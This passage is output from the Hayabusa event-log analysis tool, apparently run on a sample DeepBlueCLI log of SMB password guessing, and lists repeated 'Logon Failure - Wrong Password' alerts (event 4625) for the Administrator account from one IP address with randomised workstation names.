NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: 